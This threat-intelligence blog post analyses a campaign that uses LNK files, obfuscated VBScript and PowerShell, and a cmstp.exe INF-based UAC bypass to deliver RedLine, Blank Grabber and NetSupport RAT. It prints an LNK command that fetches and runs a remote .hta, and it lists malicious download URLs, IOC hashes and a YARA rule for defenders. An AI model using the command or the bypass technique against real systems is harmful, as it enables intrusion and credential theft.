Key Takeaways
- The blog highlights an infection chain that leverages the Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass.
- Similar VBScript and PowerShell scripts were used in past campaigns to deliver Invicta Stealer without leveraging CMSTP, indicating that attackers might have updated TTPs.
- The infection chain begins with a .zip or .iso file and progresses through multiple stages involving distinct malware payloads, initially starting with a ‘.lnk’ file.”
- The scripts employed in the intermediate stages are executed on the fly to be evasive.
Executive Summary
In early 2022, Microsoft made an announcement asking users to disable macros by default in Office documents downloaded from the Internet. In response, TAs shifted away from utilizing malicious macros for initial access. Instead, they began favoring various executable attachments. TAs started depending more on malicious LNK files as the preferred method for initial access, enabling them to download and execute payloads. During this timeframe, Cyble Research and Intelligence Labs (CRIL) also discovered an LNK builder named “Quantum Lnk Builder” being offered on cybercrime forums.
We also observed a campaign that involved an infection sequence, utilizing Microsoft’s cmstp.exe for proxy execution. This campaign identified multiple malware families, all utilizing cmstp.exe to execute malicious payloads. Recently, CRIL uncovered the infection method of Invicta Stealer. Interestingly, we discovered that this campaign employs a similar script for fetching malware payloads. However, the infection chain used to deliver Invicta stealer does not involve cmstp.exe, which suggests the TAs might have evolved their TTPs.
We suspect that TAs might be employing spam emails to disseminate malicious attachments. This campaign’s infection chain commences with a malicious .zip or .iso file. Within these files, a lnk file serves as the trigger for a remote VBScript.
The VBScript facilitates de-obfuscation and initiates the execution of a PowerShell Loader, subsequently activating a PowerShell downloader. This downloader retrieves a malware payload and sometimes also downloads a decoy file. Additionally, a malicious .inf file is dropped. Upon execution through cmstp.exe, this .inf file becomes the conduit for launching the malware payload. The figure below shows the infection chain.
Initial Infection
The initial infection commences with a .zip or .iso file. These files contain a malicious .lnk file, often disguised as a PDF. This lnk file initiates a command execution, leading to the remote execution of an .hta file. For example, in one of the cases, the following command is executed by an lnk file: “C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S2\mh?a.* ‘http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta’“.
This command references a potentially malicious .hta file hosted on a remote server. The figure below shows the .lnk file.
This command will launch mshta.exe and execute the remote file located at “‘http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta'”. This file uses multiple layers of obfuscation to hide the malicious VBScript.
The figure below shows the process tree.
Technical Analysis
The .hta file executed by the .lnk file consists of VBScript. In this campaign, we primarily observed two distinct obfuscation techniques employed on VBScript. Regardless of the obfuscation method applied, all the VBScripts delivered a similar PowerShell loader.
First Obfuscation Technique
In this obfuscation approach, the TA employs a tactic to obscure information by manipulating arrays of integer values. It performs subtraction operations on these arrays with a constant value – for example, the value is 44536 for this obfuscation layer.
The figure below shows the decoding routine in the .hta file.
The TA has hardcoded integer values into two arrays, which are subsequently converted into their corresponding ASCII characters. The first array consists of a PowerShell script, and the second array decodes to ‘Wscript.Shell’. The script will utilize the WScript.Shell.Run method to execute the PowerShell script. The figure below displays the decoded content of the .hta file.
To fetch the content of the next stage PowerShell loader, we created a simple Python script. This script consists of an array, assigned with integer values and a constant.
The figure below shows the Python script.
Second Obfuscation Technique
This obfuscation technique involves numeric calculations to obtain ASCII values. However, a unique aspect of this technique is the subtraction performed between a decimal value and a hexadecimal value prefixed with “&H”. This prefixed hexadecimal value is subsequently converted into its decimal equivalent. After de-obfuscating the data, it is executed using the Execute function.
PowerShell Loader
The PowerShell script shown in the figure below contains encrypted data stored within a variable. The AES (Advanced Encryption Standard) algorithm has encrypted the data. The script’s purpose is to decrypt this encrypted data and subsequently decompress it. The resulting content forms a next-stage PowerShell Downloader, which is then piped to another instance of the PowerShell process.
We authored a Python script to fetch the content of the next Stage Downloader. The figure below shows the Python script.
PowerShell Downloader
The content within the PowerShell downloader is divided into distinct segments, employing diverse encoding techniques. Additionally, the script encompasses multiple arrays that undergo de-obfuscation using the same approach illustrated in Figure 4.
For example, in one of the cases, these arrays translated into the subsequent strings:
- Hidden
- WebClient/
- hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
- hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
The figure below shows the final PowerShell Downloader.
This script downloads files from the following URLs and saves them to the “AppData\Roaming” directory while preserving their original names.
- hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
- hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
The figure below shows the network activity.
It downloads one clean PDF file and a RedLine stealer binary. It also opens the clean PDF to hide its malicious behavior. The figure below shows the PDF file.
Leveraging CMSTP
The PowerShell downloader leverages cmstp.exe for proxy execution and UAC bypass. It uses the Set-INFFile function to create an INF (Information) file. It takes parameters like the location of the INF file ($InfFileLocation) and a command to execute ($CommandToExecute).
It drops a malicious .inf file named “CMSTP.inf” into the %temp% directory and initiates its execution by starting the cmstp process (Connection Manager Profile Installer) with arguments “/au” and “$InfFileLocation”, as shown in Figure below.
In this case, the script attempts to leverage the cmstp process to execute commands without triggering a UAC prompt. The RunPreSetupCommandSection in the INF file consists of the path to the malware payload. Therefore, when the cmstp.exe is spawned with the malicious INF as the argument, it executes the malware payload with elevated privileges. Subsequently, it installs a fabricated connection manager service profile labeled as ‘Notepad.
The figure below shows the malicious “.inf” file.
Malware Payloads
Blank Grabber
Blank Grabber is an open-source stealer coded in Python. This stealer is equipped with a GUI builder, which can be used to conveniently generate a stealer payload. The builder provides the option to customize stealer payloads such as UAC bypass, custom icon, and startup execution for persistence.
It has multiple anti-VM functions. It employs obfuscated code, fake errors, and EXE binding to conceal itself while capturing browser data, Discord tokens, gaming sessions, passwords, and cookies. Additionally, it steals system info, IP details, webcam images, and crypto wallets, forwarding all data through Discord Webhooks or Telegram Bot.
The figure below depicts the strings associated with BlackGrabber found within the binary delivered in this campaign:
Redline Stealer
RedLine Stealer is one of the most prominent InfoStealers in cyberspace. It is sold on cybercrime forums and can steal data and introduce additional malware to operating systems. Cybercriminals deploy it to gain unauthorized access to sensitive information like logins, passwords, autofill data, and credit card details from Gecko and Chromium browsers. Detailed analysis of Redline Stealer can be found here.
Apart from the domain mentioned in the initial analysis, we found that the following domains were delivering Redline Stealer binary:
- hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe
- hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe
NetSupport RAT
NetSupport Manager, a commercially available RAT (Remote Administration Tool), is primarily intended for legitimate remote access to user computers by administrators. Regrettably, TAs also misuse this tool to gain unauthorized access to compromised systems. Security Researcher Kostas identified an instance where NetSupportRAT was executed using cmstp, and we encountered several similar cases as well. We observed the following URL spreading NetSupportRAT:
hxxps://montec-shop[.]de/images/client32[.]exe
Conclusion
The adoption of Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass serves as a significant illustration of the attacker’s adaptability. The pervasive use of obfuscation methods alongside the integration of multi-stage attack sequences underscores the perpetrators’ persistent pursuit of evasive maneuvers.
Previously, we’ve encountered tools like the Quantum Lnk Builder, which were available for purchase on cybercrime forums. These tools are designed to generate malicious LNK files, and their accessibility has undoubtedly facilitated TAs’ pursuits. The presence of such utilities streamlines the process for TAs to experiment with various techniques and deploy different types of attacks.
Our Recommendations
• In this campaign, where malicious INF files are being distributed and executed via CMSTP.exe, we recommend that organizations block the execution of CMSTP.exe under specific circumstances. This involves detecting instances where the command line parameter of CMSTP.exe includes both the ‘/au’ flag and the ‘\AppData\Local\Temp’ string.
• The initial infection occurs via spam email. Therefore, it is advisable to deploy effective email filtering solutions to identify and prevent the delivery of malicious attachments.
MITRE ATT&CK® Techniques
| Tactic  | Technique ID  | Technique Name  |
| Execution  | T1204
|
User Execution |
| Persistence | T1547 | |
| Privilege Escalation | T1548.002 | Bypass User Account Control |
| Defense Evasion  | T1027 | Obfuscated Files or Information MasqueradingSystem Binary Proxy Execution: CMSTP |
| Credential Access    | T1528 | Steal Application Access Token
Credentials from Password Stores |
| Discovery    | T1010 | Application Window Discovery
File and Directory Discovery
|
| Collection | T1005 | Data from the Local System |
| Command and Control    | T1071 | Application Layer Protocol |
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| 110ea5727b750a69876de6613ba71c8f80ededd2e7cef2a276a855082affcd9f | SHA256 | Blank Grabber |
| https[:]//transfer.sh/iATCFJFn3d/Video_of%20Dollar_Recalling.exe | URL | Malicious URL |
| a6c163e45059640158828422622606f0d1608bb61ed0cb3cb27a138fe1c50c6d | SHA256 | Malicious HTA File |
| hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe | URL | Malicious URL |
| hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe | URL | Malicious URL |
| 27fd34dae9c30605a0739011fce957acd40c679b1b19a079946c4a6e6a0445f9 | MD5
SHA1 SHA256 |
Redline Stealer |
| 513bc40cedbb94ee65afe77dac8464bb2693a098a15a08bb68a761acec223cdd | SHA256 | Redline Stealer |
| 3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115 | SHA256 | Malicious Lnk File |
| bbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563 | SHA256 | Malicious Lnk File |
| 9905c430c3aa6e909c773af010ef8045521aba759d20a036ce065d8bf88eb9ee | SHA256 | Malicious HTA File |
| 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 | SHA256 | NetSupportManager |
| hxxps://montec-shop[.]de/images/client32[.]exe | URL | Malicious URL |
| hxxp[:]//94.156.253[.]17/Downloads/careabout[.]hta | URL | Malicious URL |
| 6f08017be2fb3359cc15e2325e934465a9e7257657809f712c85f51a568e9dfc | SHA256 | Malicious Lnk File |
| 0786f1889d5f3f73b5d25289b2d9d8f6a578758bc6987f88d8ae7c81c2baacd9 | SHA256 | Malicious Lnk File |
| e9abe79fceded092601af33d75859030242fd1e9ad4978cd1ceba5d9e9d88d7e | SHA256 | Malicious Lnk File |
| de3d0a11dec2e3b4afce991a690024e96dca389f8a0a3c6a65b559c9f1c12d59 | SHA256 | Malicious Lnk File |
| f9446736df6a16ba5747b617d8f69a327ec150a07f7e0adb944b65e23c2fcdc9 | SHA256 | Malicious Lnk File |
| 8f65f6a346f568171760ce5b747bd6177a2e0111d37a3df5047905c4f1f86346 | SHA256 | Malicious Lnk File |
| 687baa62d88a16ae54e4ff3ad584a5c7bdf71121a0fc84d863363f064cd6053b | SHA256 | Malicious Lnk File |
| 1126845e909b7c776e5b48bf64db24f19b0183b7204f50aedfb8ecba52c8dcbb | SHA256 | Malicious Lnk File |
| c2807549c5965cf165839b876f8dd3ea44d51478e4cdc4dcca6146b223b0066d | SHA256 | Malicious Lnk File |
| cf8decdb1efe459a0e8d5817d209cfdd27731694956db3e111f1f8cb32456a7a | SHA256 | Malicious Lnk File |
| 837f7e7a6799e25767839e487d97a5b61d9dc43add143e4b3680d756fefc1b95 | SHA256 | Malicious Lnk File |
| 845087bb407b34d8003174a3b63b6c50c7ab4b13ef81636b8344740bb7a8559c | SHA256 | Malicious Lnk File |
| a2dfcc3e26858a9c730b7c10b55f82ae4dcea1a35826cfbe992287df80c4929b | SHA256 | Malicious Lnk File |
| 84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fef | SHA256 | Malicious Lnk File |
| 59b392a0ff9a3ff064b5a4ab90de5b68c758429280c612fd08f9399475d3108d | SHA256 | Malicious Lnk File |
| 48cffc07e026c38234b77ca74d30a07a01f16da9d8ab24be73c934d6972f0ace | SHA256 | Malicious Lnk File |
| cc652a2be3f935f1bf3c40f7033239e09357da22f98b6abcab17bbb34266a02a | SHA256 | Malicious Lnk File |
| bbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563 | SHA256 | Malicious Lnk File |
| df86358f815e4c6760f5005a283c5e842dd7091dc328ac0f73b7667f6754c8bc | SHA256 | Malicious Lnk File |
| 3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115 | SHA256 | Malicious Lnk File |
| 8b6ea98bb931bf67bcea0ff67cc5d44d956a4b3fffd1817e1f3ad89696fb3798 | SHA256 | Malicious Lnk File |
| f602321b7a764a0dffe32d9dfbac7c221fcf200f13d20e4fbfe978d56496a72b | SHA256 | Malicious Lnk File |
| d1825f07b07560f8d76c8d9125fc3029a4b328ecca836d01b5934ff8f02a32e1 | SHA256 | Malicious Lnk File |
| a08c36812818618f44782c3677c8b8b8159a1beacbad66adbe232e694d91176e | SHA256 | Malicious Lnk File |
| e9cbfe72cf4bf807f57df16611bea622c77ad501ee85c39ed171b8cdb05ba092 | SHA256 | Malicious Lnk File |
| 3a00180db6da59cc44933db6faa043b1ae770098a4eb52d5c2f4cf060cb60d72 | SHA256 | Malicious Lnk File |
| 7fd01399dec681c37cd14edeb37c601a85e1a3e567d0ff2accca1dad4bc9c53b | SHA256 | Malicious Lnk File |
YARA Rule
{
strings:
$magic = {4C 00 00 00 01 14 02 00}
$a1 = “m*h?a” ascii wide nocase
$a2 = “m*h*a*” ascii wide nocase
$a3 = “.vbs” ascii wide nocase
$a4 = “powershell” ascii wide nocase
$a5 = “.hta” wide nocase
condition:
$magic at 0Â and ($a1 or $a2) and ($a3 or $a4 or $a5)
}
